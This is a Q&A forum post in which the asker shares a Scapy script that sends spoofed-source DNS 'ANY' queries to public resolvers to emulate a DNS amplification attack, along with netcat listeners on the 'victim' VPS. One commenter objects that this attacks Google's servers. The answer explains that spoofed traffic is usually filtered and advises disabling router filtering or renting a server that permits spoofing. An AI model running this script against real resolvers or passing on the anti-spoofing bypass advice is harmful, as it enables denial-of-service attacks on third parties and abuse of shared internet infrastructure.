# Dns amplification attack demo

Tags: python, security, dns, scapy, netcat

I wrote a script to emulate DNS amplification attack

```
from scapy.all import *


target='XXXXXXXX'

for ip in ('8.8.8.8', '1.1.1.1')
    packet = IP(src=target, dst=ip)/UDP(dport=53)/DNS(rd=1, qdcount=1, qd=DNSQR(qname='google.com', qtype='ANY'))
    send(packet)
```

and in the target machine, I run Netcat to get a response from the DNS servers

the target machine is a VPS with a public IP address

```
ncat -nlvp 53

ncat -u -nlvp 53
```

But I don't get any response, where's wrong?

Comment: Unless you work at Google, those IP addresses aren't yours, and you are attaoking Google. If you have an isolated network, please [edit] your question to describe its specifics.

Comment: I'm not attacking google, I send DNS request to google and spoof source IP address and set it to my VPS server as victim machine to get google response there with Netcat

Answer (score 0):

Your DNS amplification will probably not work because you send it with a spoofed ip address. Your network router probably blocks the outgoing spoofed traffic. The only way to try this out is by either disabling network traffic filtering on your router or buying a dedicated server / vps with spoofing enabled.